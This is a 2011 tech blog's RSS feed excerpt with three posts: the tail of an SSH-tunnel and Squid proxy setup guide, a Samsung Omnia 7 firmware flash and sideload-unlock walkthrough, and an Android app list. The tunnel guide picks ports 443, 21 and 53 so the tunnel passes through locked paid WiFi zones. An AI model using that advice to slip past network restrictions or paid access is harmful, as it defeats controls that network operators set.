<li>If all is good, go back to the command window, press CTRL-C to stop squid, and then type <strong>squid –i</strong> this will install the squid service, bring up the services control panel (type <strong>services.msc</strong> and press enter), fine the one called Squid, set it to automatic, and then click the start on it. </li>
</ul>
<p>Right, Squid installed and running, lets get the SSH stuff working.</p>
<ul>
<li>Install WinSSHD that you downloaded earlier, and set it up. After the install it will go through the easy setup. It will ask you for your setup. Here’s what I have, but upto you.      </p>
<p>- Listening Port – 443       <br />- UPnP – disabled (I configure router myself, but try UPnP if your router supports it)       <br />- Open Firewall – Local       <br />- Allow any windows account – Ticked       <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/07/OpenSSHD1.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="OpenSSHD1" border="0" alt="OpenSSHD1" src="http://www.nakedcleaner.com/wp-content/uploads/2011/07/OpenSSHD1_thumb.png" width="507" height="176" /></a>       </li>
<li>Don’t worry about that too much now though, as we will configure it in the advanced config. Bring up the control Panel for the app if not already open, and click the <strong>Edit Advanced Settings </strong>link       <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/07/MainSSHD.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="MainSSHD" border="0" alt="MainSSHD" src="http://www.nakedcleaner.com/wp-content/uploads/2011/07/MainSSHD_thumb.png" width="496" height="476" /></a> </li>
<li>Goto the Server/Bindings and add some more ports (see image)      <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/07/SSHDPorts.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="SSHDPorts" border="0" alt="SSHDPorts" src="http://www.nakedcleaner.com/wp-content/uploads/2011/07/SSHDPorts_thumb.png" width="498" height="247" /></a>       <br />You can obviously tick the Enable UPnP if you like, it may make configuration of your router easier. If not ticked make sure you point the ports to the PC on your Router. </li>
<li>Everything else should be good to go. Just make sure the startup type is Automatic </li>
</ul>
<p>Client….</p>
<ul>
<li>Install the Tunnelier software, and set it up, it’s easy to get the connection going. Use your standard Windows username and password. </li>
<li>We need to set some port forwards up now. Goto the C2S Fwding      <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/07/PortForwarding.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="PortForwarding" border="0" alt="PortForwarding" src="http://www.nakedcleaner.com/wp-content/uploads/2011/07/PortForwarding_thumb.png" width="507" height="251" /></a>       <br />Add some local port captures. What we are doing here is mapping a local on your Laptop/Remote PC and map it to a port on the Server PC. Above in the image I have the following. Local port 8088 maps to the Remote 3128 for the Squid port. That way if I tell IE to use proxy LocalHost on port 8088 I am actually using Server Port 3128, and hence we get connection to the outside world, from wherever the server is located. the other two are For Terminal Services (RDP) means I can connect to the various machines by issuing the command <strong>MSTSC /V:localhost:33891 </strong>and connecting via the tunnel to the remote machine. </li>
<li>Pop into the SSH tab, and make sure the tick boxes for NONE are not ticked on Encrytion and Compression. You allways want those to be forced. </li>
<li>When your happy that it’s working as you want then save the configuration. </li>
</ul>
<p>Make sure you now have a fixed IP, or a No-IP account setup, and the software installed. Configure the client to connect to that address, and you should be good to go.</p>
<p>The ports I have setup should get you through a lot of things. 443 obviously the ‘Secure Universal hacking port’, however I’ve also got 21 (FTP) and 53 (DNS) in there, DNS specifically because most locked ‘pay for’ WiFi zones allow DNS resolution and traversal.</p>
<p>Any questions just shout in the comments.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/lT2mDKfSzflNloxZHBO1osa_vvo/0/da"><img src="http://feedads.g.doubleclick.net/~a/lT2mDKfSzflNloxZHBO1osa_vvo/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/lT2mDKfSzflNloxZHBO1osa_vvo/1/da"><img src="http://feedads.g.doubleclick.net/~a/lT2mDKfSzflNloxZHBO1osa_vvo/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=EjsM8t7-kGo:p_U441yuaF8:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=EjsM8t7-kGo:p_U441yuaF8:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=EjsM8t7-kGo:p_U441yuaF8:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=EjsM8t7-kGo:p_U441yuaF8:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=EjsM8t7-kGo:p_U441yuaF8:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=EjsM8t7-kGo:p_U441yuaF8:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=EjsM8t7-kGo:p_U441yuaF8:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=EjsM8t7-kGo:p_U441yuaF8:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=EjsM8t7-kGo:p_U441yuaF8:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=EjsM8t7-kGo:p_U441yuaF8:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=EjsM8t7-kGo:p_U441yuaF8:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=EjsM8t7-kGo:p_U441yuaF8:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=EjsM8t7-kGo:p_U441yuaF8:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/EjsM8t7-kGo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2011/07/ssh-proxyport-access/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2011/07/ssh-proxyport-access/</feedburner:origLink></item>
		<item>
		<title>Omnia 7 Mango Update</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/DQ1Zy-wSDec/</link>
		<comments>http://www.nakedcleaner.com/2011/07/omnia-7-mango-update/#comments</comments>
		<pubDate>Tue, 05 Jul 2011 08:28:00 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Mango]]></category>
		<category><![CDATA[Omnia 7]]></category>
		<category><![CDATA[Samsung]]></category>
		<category><![CDATA[WP7]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2011/06/omnia-7-mango-update/</guid>
		<description>Seems as I’m obviously in the mood to write guides at the moment, let’s do one for getting the Samsung Omnia 7 upto Mango (beta) QUICK NOTE : AT THE MOMENT HOMEBREW GETS DISABLED, I&amp;#8217;m looking into a work around for it by perhaps setting the User Permissions on the registry.  But that must wait [...]</description>
			<content:encoded><![CDATA[<p>Seems as I’m obviously in the mood to write guides at the moment, let’s do one for getting the Samsung Omnia 7 upto Mango (beta)</p>
<p><strong>QUICK NOTE : AT THE MOMENT HOMEBREW GETS DISABLED, </strong>I&#8217;m looking into a work around for it by perhaps setting the User Permissions on the registry.  But that must wait till I get back to civilization.</p>
<p><strong>UPDATE 2 : </strong>Thanks to Ou Haochuan we now have an unlock for Mango. Please see the <strong>UNLOCK </strong>notices below. If you have already updated to Mango, plug your phone in, goto Zune and settings/updates and restore your backup. Then continue below where we copy the files to the device.</p>
<p>YHD has writen up the other method using the Diag tools. Have a look <a href="http://forum.xda-developers.com/showthread.php?t=1152422" target="_blank">Here</a> on XDA-Devs for that.</p>
<p>First off, I’ll just assume your on NoDo (latest update) and have NOT sideloaded your device.</p>
<p>Ok then, first we need to backup everything on your device you want, as we will be zapping it back to fresh, just to make sure.</p>
<p>OK, let’s get what we need first.</p>
<ol>
<li><a href="http://www.zune.com">Zune Desktop</a> Installed</li>
<li>The <a href="http://dl.dropbox.com/u/10118524/Samsung.rar">Firmware</a> and <a href="http://dl.dropbox.com/u/10118524/Mango.rar">Mango</a> stuff (Mirror for <a href="http://www.nakedcleaner.com/files/Samsung.rar">Firmware</a> and <a href="http://www.nakedcleaner.com/files/Mango.rar">Mango</a>)</li>
<li><a href="http://forum.xda-developers.com/attachment.php?attachmentid=498084&amp;d=1295825731">Samsung WP7 Tools</a></li>
<li><a href="https://rs227tl.rapidshare.com/#!download|227tl|455971183|ChevronWP7.Updater.x86.zip|43|R~02E863E4E28079AF8F6D295888CEC4C7">Force NoDo</a> (just in case) and <a href="http://blog.walshie.me/walshed-phone-support-tool-official-fix-to-get-you-back-on-track">NoDo Fix tools</a></li>
<li>Sideload Unlock Files <a href="http://dl.dropbox.com/u/10118524/MangoJailbreak.rar">Here</a></li>
</ol>
<p>Ok then, let’s get started</p>
<ul>
<li>Unrar the Firmware and Mango stuff to a folder somewhere.</li>
<li>Fire up the vm_web2.exe and that should install the dev environment. It will take a while though, so we can flash the device back to 7004 while we wait.</li>
<li>Open the folder that you unpacked the Samsung rar file too, and run the I8700_Samsung_Mobile_USB_Driver_V5.2__V1.2.1050.0.exe file, this will install the drivers required to interface with the phone in Download mode. Power the phone off without a cable plugged in. Now press and hold Volume UP, Camera and press Power. Download mode will now launch.</li>
<li>Plug the USB into the PC, and tell the driver popup to skip Windows Update, drivers will be installed.</li>
<li>Run the WP7_Downloader_Ver_7.05_for_Retail_Device_(Product_Force_Select_MD5_X).exe file in the Samsung folder, ignore the errors, they are not a problem. In explorer drag the following files to the application<br />
<strong>signed_phone_Cetus_Europe.bin, signed_phone_Cetus_Europe.nb0, signed_phone_Cetus_Europe.eb0</strong> and <strong>signed_CSC_Cetus_Europe_I8700XECJJ6.csc<br />
</strong><a rel="lightbox" href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/Untitled.png"><img style="background-image: none; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; padding-top: 0px; border-width: 0px;" title="Untitled" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/Untitled_thumb.png" border="0" alt="Untitled" width="244" height="218" /></a><br />
Make sure you have a COM port named in the Port section, and that it’s green. Press the Start button, and wait for the device to reboot.<strong>NOTE : </strong>I’ve had issue with the keyboard auto complete/correct not working using the above original firmware, not sure why, but <a href="http://www.megaupload.com/?d=3N1BCLFP">This UK Unbranded ROM</a> seems to be OK. So worth using that instead of the one I’ve said at the top, however worked out the issue and written the work around below (marked UPDATE).</li>
<li>Do a quick runthrough to get the device to the main screen, no real configuration needs to be done, but we do need to add an email account, so do that when your in.</li>
<li>Email yourself the <strong>ChevronWP7.cer </strong>file, and when you receive it on the device, download it and install it by clicking on it. Also run the ChevronWP7.Reg file into the PC.</li>
<li>OK, so we now have to wait for the install you started earlier to finish. When it does plug the device into your PC and go through the Zune setup (<strong>DONT UPDATE, CLICK NOT NOW)</strong></li>
<li>Turn Flight mode on on the device, run the ChevronWP7.exe file as an admin, and allow it full rights on the firewall if asked and when it pops up, click both tick boxes and press OK to unlock<br />
<a rel="lightbox" href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/chevronwp7.png"><img style="background-image: none; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; padding-top: 0px; border-width: 0px;" title="chevronwp7" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/chevronwp7_thumb.png" border="0" alt="chevronwp7" width="244" height="196" /></a></li>
<li>Now click the Windows Start button, then All Apps, then Windows Phone Developer Tools then Application Deployment. Click Browse and find the Samsung Tools.xap file and make sure the screen on the device is unlocked and on, press Deploy.<br />
<a rel="lightbox" href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/deploy.png"><img style="background-image: none; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; padding-top: 0px; border-width: 0px;" title="deploy" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/deploy_thumb.png" border="0" alt="deploy" width="244" height="220" /></a></li>
<li>Fire up the Samsun Tools on the device, and Click the Remove Sideload Limit, and the Prevent Device From Relocking, click Apply Changes then press the Reboot button.</li>
<li>OK, now we need to do the NoDo update, so turn off flight mode, goto settings, about and the Update found should pop up, run through it on Zune and it should reboot your device and install NoDo. (check version number in setting/about if version 7008, then we need to unpack and run the Force NoDo and the Fix NoDo, just close Zune, run the <strong>ChevronWP7.Updater.exe, </strong>let it finish updating, then run the <strong>WPST.exe</strong> to make sure we are back on support. I know it’s a pain, but hey, Some Samsung Omnia’s don&#8217;t get the update?)</li>
<li>Once rebooted out of the update process, make sure to go back into the Samsung Tools and reset the Prevent Device Relock. <strong>Update : </strong>Also go into setting, Keyboard and set the auto correct back to on! this setting get’s copied over to Mango, but no where to change it in the Mango interface so do it NOW!</li>
<li><strong>UNLOCK : </strong>Let’s copy the needed files to the device, after unpacking the MangoJailbreak.RAR upload the WP7RootTools.xap to the device.<br />
<a rel="lightbox" href="http://www.nakedcleaner.com/wp-content/uploads/2011/07/RootTools.png"><img style="background-image: none; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; padding-top: 0px; border: 0px;" title="RootTools" src="http://www.nakedcleaner.com/wp-content/uploads/2011/07/RootTools_thumb.png" border="0" alt="RootTools" width="244" height="220" /></a></li>
<li>Now put the PC into USB download mode, so disconnect the USB cable and close Zune, and run Wp7UsbStorageEnabler.exe, click the enable button. Then plug the device back into the computer.<br />
<a rel="lightbox" href="http://www.nakedcleaner.com/wp-content/uploads/2011/07/USBEnable.png"><img style="background-image: none; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; padding-top: 0px; border: 0px;" title="USBEnable" src="http://www.nakedcleaner.com/wp-content/uploads/2011/07/USBEnable_thumb.png" border="0" alt="USBEnable" width="244" height="120" /></a></li>
<li>Launch windows Explorer (Win+E) and you should see your device listed, copy the Unlock.xml file to here, and then disconnect the device, re-run Wp7UsbStorageEnabler.exe and click Disable.<br />
<a rel="lightbox" href="http://www.nakedcleaner.com/wp-content/uploads/2011/07/Explorer.png"><img style="background-image: none; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; padding-top: 0px; border: 0px;" title="Explorer" src="http://www.nakedcleaner.com/wp-content/uploads/2011/07/Explorer_thumb.png" border="0" alt="Explorer" width="244" height="130" /></a></li>
<li>Make sure you have Network Profiler installed, if not install it from the Samsung Zone in marketplace.</li>
<li>Launch WP7 Root Tools on the device, goto Explorer, Goto <strong>My documents/Zune/Content/????/??? </strong>and rename the file in there back to unlock.xml (long hold, rename) then long hold, cut. click the back button till you get to the root of the device again (should have Application Data as top folder) and then go into the Windows folder. Click the clipboard at the bottom to paste the file into  here.</li>
<li>Slide across to the registry editor, go to <strong>HKLM\System\State\Samsung\Phone\Operator\Base</strong> you will see at least one folder in here, click the first one, select Filename and replace the filename with unlock.xml, now select OperatorName and change that to Unlock (so we know which one it is). Press Home and then run the Network Profiler Tool, when you have run it and make sure you have the Unlock option in the list.</li>
<li>OK, close Zune, we now need to install the beta version of Zune and the dev stuff. First thing to do is uninstall Zune, so goto Control Panel, Programs and Features, find Zune and uninstall it.</li>
<li>Pop into the <strong>MangoB2-ZuneClient\Zune for Public Trial</strong> and run the StartZuneLocal.exe and run through it. When it’s finished, check the tick box to run the application. Plug the phone in and do the default setup and make sure the phone is connected properly.</li>
<li>Now into <strong>MangoB2-UpdateWP </strong>and run the relevant update (x64 for 64bit, if your not sure, run the x86 one)</li>
<li>Now run the <strong>MangoB2-DevRetailUpdate.exe </strong>from the <strong>MangoB2-DevRetailUpdate </strong>folder. This will then check your device is unlocked (reg check on device) then download the update, and reboot the phone. This will perform a backup of the device and then flash the Mango rom over.<br />
<a rel="lightbox" href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/update.png"><img style="background-image: none; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; padding-top: 0px; border-width: 0px;" title="update" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/update_thumb.png" border="0" alt="update" width="493" height="287" /></a></li>
<li>All should be good to go. Just make sure to load up the Samsung tools after it’s rebooted, and select the Prevent device from relocking option, apply, reboot.</li>
<li>Launch Zune, you should be asked to update, if not click settings/update and it will force the check. Update and …<br />
<a rel="lightbox" href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/updateinprog.png"><img style="background-image: none; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; padding-top: 0px; border-width: 0px;" title="updateinprog" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/updateinprog_thumb.png" border="0" alt="updateinprog" width="490" height="209" /></a><br />
Then it will reboot, and another update (actual Mango)<br />
<a rel="lightbox" href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/7661.png"><img style="background-image: none; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; padding-top: 0px; border-width: 0px;" title="7661" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/7661_thumb.png" border="0" alt="7661" width="492" height="212" /></a></li>
<li><strong>UNLOCK : </strong>Fire up the Network Profile tool, select the Unlock option. The device should now be Sideload enabled again. However it is worth noting that not all homebrew will still work in Mango due to changes that have been made to the COM runtime.</li>
</ul>
<p><strong>NOTE : </strong>If for some reason this method does not work, there is another method using the Samsung Diagnostic tools, if there is enough demand for that knowledge I’ll detail it. Just leave a comment.</p>
<p><strong>Welcome to Mango</strong></p>

<p><a href="http://feedads.g.doubleclick.net/~a/-hDlAqEiIwegqBC9t84UBHMomwM/0/da"><img src="http://feedads.g.doubleclick.net/~a/-hDlAqEiIwegqBC9t84UBHMomwM/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/-hDlAqEiIwegqBC9t84UBHMomwM/1/da"><img src="http://feedads.g.doubleclick.net/~a/-hDlAqEiIwegqBC9t84UBHMomwM/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DQ1Zy-wSDec:HYN9V1yOP8k:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DQ1Zy-wSDec:HYN9V1yOP8k:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=DQ1Zy-wSDec:HYN9V1yOP8k:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DQ1Zy-wSDec:HYN9V1yOP8k:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=DQ1Zy-wSDec:HYN9V1yOP8k:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DQ1Zy-wSDec:HYN9V1yOP8k:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DQ1Zy-wSDec:HYN9V1yOP8k:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=DQ1Zy-wSDec:HYN9V1yOP8k:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DQ1Zy-wSDec:HYN9V1yOP8k:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=DQ1Zy-wSDec:HYN9V1yOP8k:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DQ1Zy-wSDec:HYN9V1yOP8k:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=DQ1Zy-wSDec:HYN9V1yOP8k:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DQ1Zy-wSDec:HYN9V1yOP8k:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/DQ1Zy-wSDec" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2011/07/omnia-7-mango-update/feed/</wfw:commentRss>
		<slash:comments>14</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2011/07/omnia-7-mango-update/</feedburner:origLink></item>
		<item>
		<title>Useful Stuff (Android)</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/OCRqavZwAUo/</link>
		<comments>http://www.nakedcleaner.com/2011/07/useful-stuff-android/#comments</comments>
		<pubDate>Mon, 04 Jul 2011 22:57:20 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2011/07/useful-stuff-android/</guid>
		<description>Thought I would knock this together to help those new to the Android world out. This get’s a little difficult in the Android world because there is the Rooted and Un-Rooted world to think about, and the abilities of the two are different. Let’s start with the stuff everyone can enjoy first. Amazon AppStore – [...]</description>
			<content:encoded><![CDATA[<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/07/android-logo1.png" rel="lightbox"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; float: left; border-top: 0px; border-right: 0px; padding-top: 0px" title="android-logo" border="0" alt="android-logo" align="left" src="http://www.nakedcleaner.com/wp-content/uploads/2011/07/android-logo_thumb1.png" width="211" height="159" /></a>Thought I would knock this together to help those new to the Android world out.</p>
<p>This get’s a little difficult in the Android world because there is the Rooted and Un-Rooted world to think about, and the abilities of the two are different. </p>
<p>Let’s start with the stuff everyone can enjoy first.</p>
<p>Amazon AppStore – Not technically an App, but a useful place to find them. Unfortunately though it’s only available for the US audience. Sort of. Pop over to <a href="http://android.modaco.com/content/software/336184/using-the-amazon-appstore-from-outside-the-us-including-paid-apps/">Paul’s post</a> on Modaco for the international install.</p>
<p><a href="https://market.android.com/search?q=angry+birds&amp;so=1&amp;c=apps">Angry Birds</a> – 3 Versions available now, all fun and while away the time. </p>
<p><a href="https://market.android.com/details?id=com.bt.mnie.wispr&amp;feature=search_result">BTFon</a> – Worth having if you have a FOn or BTOpenZone account.</p>
<p><a href="https://market.android.com/details?id=bbc.iplayer.android&amp;feature=search_result">BBC iPlayer</a> – iPlayer mobile</p>
<p><a href="https://market.android.com/details?id=com.google.android.apps.chrometophone&amp;feature=search_result">Chrome to Phone</a> – Opens a link on your device, directly from a click in Chrome on the PC.</p>
<p><a href="https://market.android.com/details?id=com.google.code.appsorganizer&amp;feature=search_result">Apps Organizer</a> – Does what it says on the tin. I use it in conjunction with…</p>
<p align="left"><a href="https://market.android.com/details?id=com.h9kdroid.multicon&amp;feature=search_result">Multicon</a> – Allows you to create multiple icons in one widget space. Great for the home screen.</p>
<p align="left"><a href="https://market.android.com/details?id=com.google.zxing.client.android&amp;feature=search_result">Barcode Scanner</a> – Scans most anything, including QR codes.</p>
<p align="left"><a href="https://market.android.com/details?id=com.dropbox.android&amp;feature=search_result">Dropbox</a> – Dropbox client.</p>
<p align="left"><a href="https://market.android.com/details?id=com.estrongs.android.pop&amp;feature=search_result">ES File Explorer</a> – Best all round free explorer for file system and network</p>
<p align="left"><a href="https://market.android.com/details?id=com.estrongs.android.pop&amp;feature=search_result">GMote</a> – Remote control any PC. Also allows streaming music as well now.</p>
<p align="left"><a href="https://market.android.com/search?q=handcent&amp;so=1&amp;c=apps">Handcent SMS</a> – Replacement to the standard SMS client. Supports plugins including Emoji and lots of other things.</p>
<p align="left"><a href="https://market.android.com/details?id=com.hullomail.messaging.android&amp;feature=search_result">Hullo Mail</a> – Intelligent voicemail, push notifications, push to gmail allsorts of stuff.</p>
<p align="left"><a href="https://market.android.com/details?id=com.google.android.music&amp;feature=search_result">Google Music</a> – Sync’s your local collection to the cloud, allows it to be played anywhere your device has a connection.</p>
<p align="left"><a href="https://market.android.com/details?id=com.spotify.mobile.android.ui&amp;feature=search_result">Spotify</a> – In a similar vain to above, however needs a Spotify paid account.</p>
<p align="left"><a href="http://notifo.com/mobile_apps">Notifo</a> – Not in the market yet, but available to try out. Push notifications for all sorts, including Twitter.</p>
<p align="left"><a href="https://market.android.com/details?id=com.twitter.android&amp;feature=search_result">Twitter</a> – Official Twitter client. Works and always reliable.</p>
<p align="left"><a href="https://market.android.com/details?id=com.twidroid&amp;feature=search_result">Twidroyd</a> – My current favourite Twitter client. Although had a couple of FC’s</p>
<p align="left"><a href="https://market.android.com/details?id=com.launcher.plugin&amp;feature=search_result">Plug in Launcher</a> – Get your device to do stuff when you plug things in (Headphones, Power, USB). Can launch any app on the events, as well as do some basic commands</p>
<p align="left"><a href="https://market.android.com/details?id=net.dinglisch.android.taskerm&amp;feature=search_result">Tasker</a> – If you want a little more power than Plug in launcher then this is the app for you, the possibilities are endless as to what can be done with this application. Have a <a href="http://tasker.dinglisch.net/">look here</a> for some of the info on what’s possible.</p>
<p align="left"><a href="https://market.android.com/search?q=Mobo+Player+&amp;so=1&amp;c=apps">Mobo Player</a> – Media player, plays pretty much anything.</p>
<p align="left"><a href="https://market.android.com/details?id=com.zegoggles.smssync&amp;feature=search_result">SMS Backup+</a> – Backs up your SMS messages automatically to your GMail account</p>
<p align="left"><a href="https://market.android.com/details?id=com.droidgram.spareparts&amp;feature=search_result">Spare Parts+</a> – Tweak and change a bunch of Android stuff. Think of this as the options missing from the Settings app.</p>
<p align="left"><a href="https://market.android.com/details?id=com.inizz&amp;feature=search_result">Sweet Dreams</a> – Sets ringer and device profile based on time/location/surrounding noise. It’s an Auto Nightmode app basically. It’s great though because it’s fire and forget</p>
<p align="left"><a href="https://market.android.com/details?id=com.thrutu.client&amp;feature=search_result">Thrutu</a> – Not 100% about this one at the moment, but seems useful. Pop’s up when you make a call and offers extended interactivity with the other person as long as they have it as well. Stuff ranges from doodling, location, Paypal transfers and various others.</p>
<p align="left"><a href="https://market.android.com/details?id=com.yxlk.uninstaller&amp;feature=search_result">Uninstaller</a> – Does exactly what it says. Uninstalls apps without the need to go into market or settings.</p>
<p align="left">There is obviously a whole bunch I’ve not mentioned as I’m sure you have bumped into them already (Paypal, Ebay, Earth, GMail, Maps/Nav)</p>
<p align="left">Have I missed owt? pop em in the comments and I’ll update the post.</p>
<p align="left">More to come, next up, Android the Rooted tool… and then Windows Phone 7…</p>

<p><a href="http://feedads.g.doubleclick.net/~a/eVkaI5lNRv1MvXalHhh6c-aelhY/0/da"><img src="http://feedads.g.doubleclick.net/~a/eVkaI5lNRv1MvXalHhh6c-aelhY/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/eVkaI5lNRv1MvXalHhh6c-aelhY/1/da"><img src="http://feedads.g.doubleclick.net/~a/eVkaI5lNRv1MvXalHhh6c-aelhY/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=OCRqavZwAUo:Daf8wdiNHVA:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=OCRqavZwAUo:Daf8wdiNHVA:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=OCRqavZwAUo:Daf8wdiNHVA:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=OCRqavZwAUo:Daf8wdiNHVA:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=OCRqavZwAUo:Daf8wdiNHVA:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=OCRqavZwAUo:Daf8wdiNHVA:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=OCRqavZwAUo:Daf8wdiNHVA:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=OCRqavZwAUo:Daf8wdiNHVA:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=OCRqavZwAUo:Daf8wdiNHVA:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=OCRqavZwAUo:Daf8wdiNHVA:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=OCRqavZwAUo:Daf8wdiNHVA:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=OCRqavZwAUo:Daf8wdiNHVA:wF9xT3WuBAs" border="0"></img></a> <a 